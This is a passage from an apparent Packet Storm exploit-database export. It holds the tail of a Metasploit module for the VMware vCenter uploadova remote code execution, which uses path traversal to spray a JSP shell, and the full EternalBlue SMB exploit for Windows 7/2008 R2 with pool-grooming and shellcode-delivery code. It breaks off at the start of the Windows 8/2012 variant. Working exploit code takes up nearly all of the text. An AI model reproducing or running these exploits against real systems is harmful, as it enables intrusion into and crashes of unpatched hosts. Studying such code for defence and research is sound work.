\n \nCheckCode::Detected('Target did not respond with expected keys.') \nwhen 401 \nCheckCode::Safe('Unauthenticated endpoint access denied.') \nelse \nCheckCode::Detected(\"Target responded with code #{res.code}.\") \nend \nend \n \ndef exploit \nupload_ova \npop_thy_shell # ;) \nend \n \ndef upload_ova \nprint_status(\"Uploading OVA file: #{ova_filename}\") \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \ngenerate_ova, \n'application/x-tar', # OVA is tar \n'binary', \n%(form-data; name=\"uploadFile\"; filename=\"#{ova_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'), \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res && res.code == 200 && res.body == 'SUCCESS' \nfail_with(Failure::NotVulnerable, 'Failed to upload OVA file') \nend \n \nregister_files_for_cleanup(*jsp_paths) \n \nprint_good('Successfully uploaded OVA file') \nend \n \ndef pop_thy_shell \njsp_uri = \ncase target['Platform'] \nwhen 'linux' \nnormalize_uri(target_uri.path, \"/ui/resources/#{jsp_filename}\") \nwhen 'win' \nnormalize_uri(target_uri.path, \"/statsreport/#{jsp_filename}\") \nend \n \nprint_status(\"Requesting JSP payload: #{full_uri(jsp_uri)}\") \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri \n) \n \nunless res && res.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to request JSP payload') \nend \n \nprint_good('Successfully requested JSP payload') \nend \n \ndef generate_ova \nova_file = StringIO.new \n \n# HACK: Spray JSP in the OVA and pray we get a shell... \nRex::Tar::Writer.new(ova_file) do |tar| \njsp_paths.each do |path| \n# /tmp/unicorn_ova_dir/../../<path> \ntar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) } \nend \nend \n \nova_file.string \nend \n \ndef jsp_paths \ncase target['Platform'] \nwhen 'linux' \n@jsp_paths ||= spray_and_pray_range.shuffle.map do |idx| \n\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}\" \nend \nwhen 'win' \n# Forward slashes work here \n[\"/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}\"] \nend \nend \n \ndef ova_filename \n@ova_filename ||= \"#{rand_text_alphanumeric(8..42)}.ova\" \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..42)}.jsp\" \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161695/vmware_vcenter_uploadova_rce.rb.txt"}, {"lastseen": "2017-05-20T17:27:32", "description": "", "cvss3": {}, "published": "2017-05-20T00:00:00", "type": "packetstorm", "title": "Microsoft Windows 7/2008 R2 x64 EternalBlue Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144"], "modified": "2017-05-20T00:00:00", "id": "PACKETSTORM:142603", "href": "https://packetstormsecurity.com/files/142603/Microsoft-Windows-7-2008-R2-x64-EternalBlue-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \nfrom impacket import smb \nfrom struct import pack \nimport os \nimport sys \nimport socket \n \n''' \nEternalBlue exploit for Windows 7/2008 by sleepya \nThe exploit might FAIL and CRASH a target system (depended on what is overwritten) \n \nTested on: \n- Windows 7 SP1 x64 \n- Windows 2008 R2 x64 \n \nReference: \n- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \n \n \nBug detail: \n- For the bug detail, please see http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \n- You can see SrvOs2FeaListToNt(), SrvOs2FeaListSizeToNt() and SrvOs2FeaToNt() functions logic from WinNT4 source code \nhttps://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/ea.c#L263 \n- In vulnerable SrvOs2FeaListSizeToNt() function, there is a important change from WinNT4 in for loop. The psuedo code is here. \nif (nextFea > lastFeaStartLocation) { \n// this code is for shrinking FeaList->cbList because last fea is invalid. \n// FeaList->cbList is DWORD but it is cast to WORD. \n*(WORD *)FeaList = (BYTE*)fea - (BYTE*)FeaList; \nreturn size; \n} \n- Here is related struct info. \n##### \ntypedef struct _FEA { /* fea */ \nBYTE fEA; /* flags */ \nBYTE cbName; /* name length not including NULL */ \nUSHORT cbValue; /* value length */ \n} FEA, *PFEA; \n \ntypedef struct _FEALIST { /* feal */ \nDWORD cbList; /* total bytes of structure including full list */ \nFEA list[1]; /* variable length FEA structures */ \n} FEALIST, *PFEALIST; \n \ntypedef struct _FILE_FULL_EA_INFORMATION { \nULONG NextEntryOffset; \nUCHAR Flags; \nUCHAR EaNameLength; \nUSHORT EaValueLength; \nCHAR EaName[1]; \n} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION; \n###### \n \n \nExploit info: \n- I do not reverse engineer any x86 binary so I do not know about exact offset. \n- The exploit use heap of HAL (address 0xffffffffffd00010 on x64) for placing fake struct and shellcode. \nThis memory page is executable on Windows 7 and Wndows 2008. \n- The important part of feaList and fakeStruct is copied from NSA exploit which works on both x86 and x64. \n- The exploit trick is same as NSA exploit \n- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \n- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5) \n- See the code and comment for exploit detail. \n \n \nsrvnet buffer info: \n- srvnet buffer contains a pointer to another struct and MDL about received buffer \n- Controlling MDL values results in arbitrary write \n- Controlling pointer to fake struct results in code execution because there is pointer to function \n- A srvnet buffer is created after target receiving first 4 bytes \n- First 4 bytes contains length of SMB message \n- The possible srvnet buffer size is \"..., 0x8???, 0x11000, 0x21000, ...\". srvnet.sys will select the size that big enough. \n- After receiving whole SMB message or connection lost, server call SrvNetWskReceiveComplete() to handle SMB message \n- SrvNetWskReceiveComplete() check and set some value then pass SMB message to SrvNetCommonReceiveHandler() \n- SrvNetCommonReceiveHandler() passes SMB message to SMB handler \n- If a pointer in srvnet buffer is modified to fake struct, we can make SrvNetCommonReceiveHandler() call our shellcode \n- If SrvNetCommonReceiveHandler() call our shellcode, no SMB handler is called \n- Normally, SMB handler free the srvnet buffer when done but our shellcode dose not. So memory leak happen. \n- Memory leak is ok to be ignored \n''' \n \n# wanted overflown buffer size (this exploit support only 0x10000 and 0x11000) \n# the size 0x10000 is easier to debug when setting breakpoint in SrvOs2FeaToNt() because it is called only 2 time \n# the size 0x11000 is used in nsa exploit. this size is more reliable. \nNTFEA_SIZE = 0x11000 \n# the NTFEA_SIZE above is page size. We need to use most of last page preventing any data at the end of last page \n \nntfea10000 = pack('<BBH', 0, 0, 0xffdd) + 'A'*0xffde \n \nntfea11000 = (pack('<BBH', 0, 0, 0) + '\\x00')*600 # with these fea, ntfea size is 0x1c20 \nntfea11000 += pack('<BBH', 0, 0, 0xf3bd) + 'A'*0xf3be # 0x10fe8 - 0x1c20 - 0xc = 0xf3bc \n \nntfea1f000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x2494 # with these fea, ntfea size is 0x1b6f0 \nntfea1f000 += pack('<BBH', 0, 0, 0x48ed) + 'A'*0x48ee # 0x1ffe8 - 0x1b6f0 - 0xc = 0x48ec \n \nntfea = { 0x10000 : ntfea10000, 0x11000 : ntfea11000 } \n \n''' \nReverse from srvnet.sys (Win7 x64) \n- SrvNetAllocateNonPagedBufferInternal() and SrvNetWskReceiveComplete(): \n \n// for x64 \nstruct SRVNET_BUFFER { \n// offset from POOLHDR: 0x10 \nUSHORT flag; \nchar pad[2]; \nchar unknown0[12]; \n// offset from SRVNET_POOLHDR: 0x20 \nLIST_ENTRY list; \n// offset from SRVNET_POOLHDR: 0x30 \nchar *pnetBuffer; \nDWORD netbufSize; // size of netBuffer \nDWORD ioStatusInfo; // copy value of IRP.IOStatus.Information \n// offset from SRVNET_POOLHDR: 0x40 \nMDL *pMdl1; // at offset 0x70 \nDWORD nByteProcessed; \nDWORD pad3; \n// offset from SRVNET_POOLHDR: 0x50 \nDWORD nbssSize; // size of this smb packet (from user) \nDWORD pad4; \nQWORD pSrvNetWekStruct; // want to change to fake struct address \n// offset from SRVNET_POOLHDR: 0x60 \nMDL *pMdl2; \nQWORD unknown5; \n// offset from SRVNET_POOLHDR: 0x70 \n// MDL mdl1; // for this srvnetBuffer (so its pointer is srvnetBuffer address) \n// MDL mdl2; \n// char transportHeader[0x50]; // 0x50 is TRANSPORT_HEADER_SIZE \n// char netBuffer[0]; \n}; \n \nstruct SRVNET_POOLHDR { \nDWORD size; \nchar unknown[12]; \nSRVNET_BUFFER hdr; \n}; \n''' \n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing \n# Here is the important fields on x64 \n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request. \n# The value MUST point to valid (might be fake) struct. \n# - offset 0x70 (MDL) : MDL for describe receiving SMB request buffer \n# - 0x70 (VOID*) : MDL.Next should be NULL \n# - 0x78 (USHORT) : MDL.Size should be some value that not too small \n# - 0x7a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL) \n# - 0x80 (VOID*) : MDL.Process should be NULL \n# - 0x88 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write. \n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit). \n# \n# \n# To free the corrupted srvnet buffer, shellcode MUST modify some memory value to satisfy condition. \n# Here is related field for freeing corrupted buffer \n# - offset 0x10 (USHORT): be 0xffff to make SrvNetFreeBuffer() really free the buffer (else buffer is pushed to srvnet lookaside) \n# a corrupted buffer MUST not be reused. \n# - offset 0x48 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0 \n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to \n# your shellcode as function argument \n# - offset 0x60 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set \n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\". \n# Here is x64 assembly code for setting nByteProcessed field \n# - fetch SRVNET_BUFFER address from function argument \n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40] \n# - set nByteProcessed for trigger free after return \n# \\x8b\\x4a\\x2c mov ecx, [rdx+0x2c] \n# \\x89\\x4a\\x38 mov [rdx+0x38], ecx \n \nTARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010 \nTARGET_HAL_HEAP_ADDR_x86 = 0xffdff000 \n \nfakeSrvNetBufferNsa = pack('<II', 0x11000, 0)*2 \nfakeSrvNetBufferNsa += pack('<HHI', 0xffff, 0, 0)*2 \nfakeSrvNetBufferNsa += '\\x00'*16 \nfakeSrvNetBufferNsa += pack('<IIII', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x20) \nfakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86+0x100, 0xffffffff, 0x60, 0x1004, 0) # _, x86 MDL.Next, .Size, .MdlFlags, .Process \nfakeSrvNetBufferNsa += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86-0x80, 0, TARGET_HAL_HEAP_ADDR_x64) # x86 MDL.MappedSystemVa, _, x64 pointer to fake struct \nfakeSrvNetBufferNsa += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0) # x64 pmdl2 \n# below 0x20 bytes is overwritting MDL \n# NSA exploit overwrite StartVa, ByteCount, ByteOffset fields but I think no need because ByteCount is always big enough \nfakeSrvNetBufferNsa += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags \nfakeSrvNetBufferNsa += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80) # MDL.Process, MDL.MappedSystemVa \n \n# below is for targeting x64 only (all x86 related values are set to 0) \n# this is for show what fields need to be modified \nfakeSrvNetBufferX64 = pack('<II', 0x11000, 0)*2 \nfakeSrvNetBufferX64 += pack('<HHIQ', 0xffff, 0, 0, 0) \nfakeSrvNetBufferX64 += '\\x00'*16 \nfakeSrvNetBufferX64 += '\\x00'*16 \nfakeSrvNetBufferX64 += '\\x00'*16 # 0x40 \nfakeSrvNetBufferX64 += pack('<IIQ', 0, 0, TARGET_HAL_HEAP_ADDR_x64) # _, _, pointer to fake struct \nfakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0) # pmdl2 \nfakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags \nfakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80) # MDL.Process, MDL.MappedSystemVa \n \n \nfakeSrvNetBuffer = fakeSrvNetBufferNsa \n#fakeSrvNetBuffer = fakeSrvNetBufferX64 \n \nfeaList = pack('<I', 0x10000) # the max value of feaList size is 0x10000 (the only value that can trigger bug) \nfeaList += ntfea[NTFEA_SIZE] \n# Note: \n# - SMB1 data buffer header is 16 bytes and 8 bytes on x64 and x86 respectively \n# - x64: below fea will be copy to offset 0x11000 of overflow buffer \n# - x86: below fea will be copy to offset 0x10ff8 of overflow buffer \nfeaList += pack('<BBH', 0, 0, len(fakeSrvNetBuffer)-1) + fakeSrvNetBuffer # -1 because first '\\x00' is for name \n# stop copying by invalid flag (can be any value except 0 and 0x80) \nfeaList += pack('<BBH', 0x12, 0x34, 0x5678) \n \n \n# fake struct for SrvNetWskReceiveComplete() and SrvNetCommonReceiveHandler() \n# x64: fake struct is at ffffffff ffd00010 \n# offset 0xa0: LIST_ENTRY must be valid address. cannot be NULL. \n# offset 0x08: set to 3 (DWORD) for invoking ptr to function \n# offset 0x1d0: KSPIN_LOCK \n# offset 0x1d8: array of pointer to function \n# \n# code path to get code exection after this struct is controlled \n# SrvNetWskReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr \nfake_recv_struct = pack('<QII', 0, 3, 0) \nfake_recv_struct += '\\x00'*16 \nfake_recv_struct += pack('<QII', 0, 3, 0) \nfake_recv_struct += ('\\x00'*16)*7 \nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0xa0, TARGET_HAL_HEAP_ADDR_x64+0xa0) # offset 0xa0 (LIST_ENTRY to itself) \nfake_recv_struct += '\\x00'*16 \nfake_recv_struct += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86+0xc0, TARGET_HAL_HEAP_ADDR_x86+0xc0, 0) # x86 LIST_ENTRY \nfake_recv_struct += ('\\x00'*16)*11 \nfake_recv_struct += pack('<QII', 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x190) # fn_ptr array on x86 \nfake_recv_struct += pack('<IIQ', 0, TARGET_HAL_HEAP_ADDR_x86+0x1f0-1, 0) # x86 shellcode address \nfake_recv_struct += ('\\x00'*16)*3 \nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1e0) # offset 0x1d0: KSPINLOCK, fn_ptr array \nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1f0-1) # x64 shellcode address - 1 (this value will be increment by one) \n \n \ndef getNTStatus(self): \nreturn (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass'] \nsetattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus) \n \ndef sendEcho(conn, tid, data): \npkt = smb.NewSMBPacket() \npkt['Tid'] = tid \n \ntransCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO) \ntransCommand['Parameters'] = smb.SMBEcho_Parameters() \ntransCommand['Data'] = smb.SMBEcho_Data() \n \ntransCommand['Parameters']['EchoCount'] = 1 \ntransCommand['Data']['Data'] = data \npkt.addCommand(transCommand) \n \nconn.sendSMB(pkt) \nrecvPkt = conn.recvSMB() \nif recvPkt.getNTStatus() == 0: \nprint('got good ECHO response') \nelse: \nprint('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus())) \n \n \n# do not know why Word Count can be 12 \n# if word count is not 12, setting ByteCount without enough data will be failed \nclass SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters): \nstructure = ( \n('MaxBuffer','<H'), \n('MaxMpxCount','<H'), \n('VCNumber','<H'), \n('SessionKey','<L'), \n#('AnsiPwdLength','<H'), \n('UnicodePwdLength','<H'), \n('_reserved','<L=0'), \n('Capabilities','<L'), \n) \n \ndef createSessionAllocNonPaged(target, size): \n# The big nonpaged pool allocation is in BlockingSessionSetupAndX() function \n# You can see the allocation logic (even code is not the same) in WinNT4 source code \n# https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071 \nconn = smb.SMB(target, target) \n_, flags2 = conn.get_flags() \n# FLAGS2_EXTENDED_SECURITY MUST not be set \nflags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY \n# if not use unicode, buffer size on target machine is doubled because converting ascii to utf16 \nif size >= 0xffff: \nflags2 &= ~smb.SMB.FLAGS2_UNICODE \nreqSize = size // 2 \nelse: \nflags2 |= smb.SMB.FLAGS2_UNICODE \nreqSize = size \nconn.set_flags(flags2=flags2) \n \npkt = smb.NewSMBPacket() \n \nsessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX) \nsessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters() \n \nsessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size \nsessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value \nsessionSetup['Parameters']['VCNumber'] = os.getpid() \nsessionSetup['Parameters']['SessionKey'] = 0 \nsessionSetup['Parameters']['AnsiPwdLength'] = 0 \nsessionSetup['Parameters']['UnicodePwdLength'] = 0 \nsessionSetup['Parameters']['Capabilities'] = 0x80000000 \n \n# set ByteCount here \nsessionSetup['Data'] = pack('<H', reqSize) + '\\x00'*20 \npkt.addCommand(sessionSetup) \n \nconn.sendSMB(pkt) \nrecvPkt = conn.recvSMB() \nif recvPkt.getNTStatus() == 0: \nprint('SMB1 session setup allocate nonpaged pool success') \nelse: \nprint('SMB1 session setup allocate nonpaged pool failed') \nreturn conn \n \n \n# Note: impacket-0.9.15 struct has no ParameterDisplacement \n############# SMB_COM_TRANSACTION2_SECONDARY (0x33) \nclass SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters): \nstructure = ( \n('TotalParameterCount','<H=0'), \n('TotalDataCount','<H'), \n('ParameterCount','<H=0'), \n('ParameterOffset','<H=0'), \n('ParameterDisplacement','<H=0'), \n('DataCount','<H'), \n('DataOffset','<H'), \n('DataDisplacement','<H=0'), \n('FID','<H=0'), \n) \n \ndef send_trans2_second(conn, tid, data, displacement): \npkt = smb.NewSMBPacket() \npkt['Tid'] = tid \n \n# assume no params \n \ntransCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY) \ntransCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed() \ntransCommand['Data'] = smb.SMBTransaction2Secondary_Data() \n \ntransCommand['Parameters']['TotalParameterCount'] = 0 \ntransCommand['Parameters']['TotalDataCount'] = len(data) \n \nfixedOffset = 32+3+18 \ntransCommand['Data']['Pad1'] = '' \n \ntransCommand['Parameters']['ParameterCount'] = 0 \ntransCommand['Parameters']['ParameterOffset'] = 0 \n \nif len(data) > 0: \npad2Len = (4 - fixedOffset % 4) % 4 \ntransCommand['Data']['Pad2'] = '\\xFF' * pad2Len \nelse: \ntransCommand['Data']['Pad2'] = '' \npad2Len = 0 \n \ntransCommand['Parameters']['DataCount'] = len(data) \ntransCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len \ntransCommand['Parameters']['DataDisplacement'] = displacement \n \ntransCommand['Data']['Trans_Parameters'] = '' \ntransCommand['Data']['Trans_Data'] = data \npkt.addCommand(transCommand) \n \nconn.sendSMB(pkt) \n \n \ndef send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True): \npkt = smb.NewSMBPacket() \npkt['Tid'] = tid \n \ncommand = pack('<H', setup) \n \ntransCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT) \ntransCommand['Parameters'] = smb.SMBNTTransaction_Parameters() \ntransCommand['Parameters']['MaxSetupCount'] = 1 \ntransCommand['Parameters']['MaxParameterCount'] = len(param) \ntransCommand['Parameters']['MaxDataCount'] = 0 \ntransCommand['Data'] = smb.SMBTransaction2_Data() \n \ntransCommand['Parameters']['Setup'] = command \ntransCommand['Parameters']['TotalParameterCount'] = len(param) \ntransCommand['Parameters']['TotalDataCount'] = len(data) \n \nfixedOffset = 32+3+38 + len(command) \nif len(param) > 0: \npadLen = (4 - fixedOffset % 4 ) % 4 \npadBytes = '\\xFF' * padLen \ntransCommand['Data']['Pad1'] = padBytes \nelse: \ntransCommand['Data']['Pad1'] = '' \npadLen = 0 \n \ntransCommand['Parameters']['ParameterCount'] = len(param) \ntransCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen \n \nif len(data) > 0: \npad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4 \ntransCommand['Data']['Pad2'] = '\\xFF' * pad2Len \nelse: \ntransCommand['Data']['Pad2'] = '' \npad2Len = 0 \n \ntransCommand['Parameters']['DataCount'] = firstDataFragmentSize \ntransCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len \n \ntransCommand['Data']['Trans_Parameters'] = param \ntransCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize] \npkt.addCommand(transCommand) \n \nconn.sendSMB(pkt) \nconn.recvSMB() # must be success \n \ni = firstDataFragmentSize \nwhile i < len(data): \nsendSize = min(4096, len(data) - i) \nif len(data) - i <= 4096: \nif not sendLastChunk: \nbreak \nsend_trans2_second(conn, tid, data[i:i+sendSize], i) \ni += sendSize \n \nif sendLastChunk: \nconn.recvSMB() \nreturn i \n \n \n# connect to target and send a large nbss size with data 0x80 bytes \n# this method is for allocating big nonpaged pool (no need to be same size as overflow buffer) on target \n# a nonpaged pool is allocated by srvnet.sys that started by useful struct (especially after overwritten) \ndef createConnectionWithBigSMBFirst80(target): \n# https://msdn.microsoft.com/en-us/library/cc246496.aspx \n# Above link is about SMB2, but the important here is first 4 bytes. \n# If using wireshark, you will see the StreamProtocolLength is NBSS length. \n# The first 4 bytes is same for all SMB version. It is used for determine the SMB message length. \n# \n# After received first 4 bytes, srvnet.sys allocate nonpaged pool for receving SMB message. \n# srvnet.sys forwards this buffer to SMB message handler after receiving all SMB message. \n# Note: For Windows 7 and Windows 2008, srvnet.sys also forwards the SMB message to its handler when connection lost too. \nsk = socket.create_connection((target, 445)) \n# For this exploit, use size is 0x11000 \npkt = '\\x00' + '\\x00' + pack('>H', 0xfff7) \n# There is no need to be SMB2 because we got code execution by corrupted srvnet buffer. \n# Also this is invalid SMB2 message. \n# I believe NSA exploit use SMB2 for hiding alert from IDS \n#pkt += '\\xffSMB' # smb2 \n# it can be anything even it is invalid \npkt += 'BAAD' # can be any \npkt += '\\x00'*0x7c \nsk.send(pkt) \nreturn sk \n \n \ndef exploit(target, shellcode, numGroomConn): \n# force using smb.SMB for SMB1 \nconn = smb.SMB(target, target) \n \n# can use conn.login() for ntlmv2 \nconn.login_standard('', '') \nserver_os = conn.get_server_os() \nprint('Target OS: '+server_os) \nif not (server_os.startswith(\"Windows 7 \") or server_os.startswith(\"Windows Server 2008 \")): \nprint('This exploit does not support this target') \nsys.exit() \n \n \ntid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$') \n \n# Here is code path in WinNT4 (all reference files are relative path to https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/) \n# - SrvSmbNtTransaction() (smbtrans.c#L2677) \n# - When all data is received, call ExecuteTransaction() at (smbtrans.c#L3113) \n# - ExecuteTransaction() (smbtrans.c#L82) \n# - Call dispatch table (smbtrans.c#L347) \n# - Dispatch table is defined at srvdata.c#L972 (target is command 0, SrvSmbOpen2() function) \n# - SrvSmbOpen2() (smbopen.c#L1002) \n# - call SrvOs2FeaListToNt() (smbopen.c#L1095) \n \n# https://msdn.microsoft.com/en-us/library/ee441720.aspx \n# Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command \n# Note: cannot use SMB_COM_TRANSACTION2 for the exploit because the TotalDataCount field is USHORT \n# Note: transaction max data count is 66512 (0x103d0) and DataDisplacement is USHORT \nprogress = send_nt_trans(conn, tid, 0, feaList, '\\x00'*30, 2000, False) \n# we have to know what size of NtFeaList will be created when last fragment is sent \n \n# make sure server recv all payload before starting allocate big NonPaged \n#sendEcho(conn, tid, 'a'*12) \n \n# create buffer size NTFEA_SIZE-0x1000 at server \n# this buffer MUST NOT be big enough for overflown buffer \nallocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010) \n \n# groom nonpaged pool \n# when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one \nsrvnetConn = [] \nfor i in range(numGroomConn): \nsk = createConnectionWithBigSMBFirst80(target) \nsrvnetConn.append(sk) \n \n# create buffer size NTFEA_SIZE at server \n# this buffer will be replaced by overflown buffer \nholeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10) \n# disconnect allocConn to free buffer \n# expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer \nallocConn.get_socket().close() \n \n# hope one of srvnetConn is next to holeConn \nfor i in range(5): \nsk = createConnectionWithBigSMBFirst80(target) \nsrvnetConn.append(sk) \n \n# send echo again, all new 5 srvnet buffers should be created \n#sendEcho(conn, tid, 'a'*12) \n \n# remove holeConn to create hole for fea buffer \nholeConn.get_socket().close() \n \n# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header \nsend_trans2_second(conn, tid, feaList[progress:], progress) \nrecvPkt = conn.recvSMB() \nretStatus = recvPkt.getNTStatus() \n# retStatus MUST be 0xc000000d (INVALID_PARAMETER) because of invalid fea flag \nif retStatus == 0xc000000d: \nprint('good response status: INVALID_PARAMETER') \nelse: \nprint('bad response status: 0x{:08x}'.format(retStatus)) \n \n \n# one of srvnetConn struct header should be modified \n# a corrupted buffer will write recv data in designed memory address \nfor sk in srvnetConn: \nsk.send(fake_recv_struct + shellcode) \n \n# execute shellcode by closing srvnet connection \nfor sk in srvnetConn: \nsk.close() \n \n# nicely close connection (no need for exploit) \nconn.disconnect_tree(tid) \nconn.logoff() \nconn.get_socket().close() \n \n \nif len(sys.argv) < 3: \nprint(\"{} <ip> <shellcode_file> [numGroomConn]\".format(sys.argv[0])) \nsys.exit(1) \n \nTARGET=sys.argv[1] \nnumGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3]) \n \nfp = open(sys.argv[2], 'rb') \nsc = fp.read() \nfp.close() \n \nprint('shellcode size: {:d}'.format(len(sc))) \nprint('numGroomConn: {:d}'.format(numGroomConn)) \n \nexploit(TARGET, sc, numGroomConn) \nprint('done') \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142603/mswin72008eb-exec.txt"}, {"lastseen": "2017-05-20T17:27:32", "description": "", "cvss3": {}, "published": "2017-05-20T00:00:00", "type": "packetstorm", "title": "Microsoft Windows 8/2012 R2 x64 EternalBlue Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144"], "modified": "2017-05-20T00:00:00", "id": "PACKETSTORM:142602", "href": "https://packetstormsecurity.com/files/142602/Microsoft-Windows-8-2012-R2-x64-EternalBlue-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \nfrom impacket import smb \nfrom struct import pack \nimport os \nimport sys \nimport socket \n \n''' \nEternalBlue exploit for Windows 8 and 2012 by sleepya \nThe exploit might FAIL and CRASH a target system (depended on what is overwritten) \nThe exploit support only x64 target \nTested on: \n- Windows 2012 R2 x64 \n- Windows 8.1 x64 \nDefault Windows 8 and later installation without additional service info: \n- anonymous is not allowed to access any share (including IPC$) \n- tcp port 445 if filtered by firewall \nReference: \n- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \n- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit \nExploit info: \n- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at \nhttps://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \n- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). \nOn Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \n- The exploit is likely to crash a target when it failed \n- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \n- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5) \n- See the code and comment for exploit detail. \nDisable NX method: \n- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \n- The exploit is also the same but we need to trigger bug twice \n- First trigger, set MDL.MappedSystemVa to target pte address \n- Write '\\x00' to disable the NX flag \n- Second trigger, do the same as Windows 7 exploit \n- From my test, if exploit disable NX successfully, I always get code execution \n''' \n \n# because the srvnet buffer is changed dramatically from Windows 7, I have to 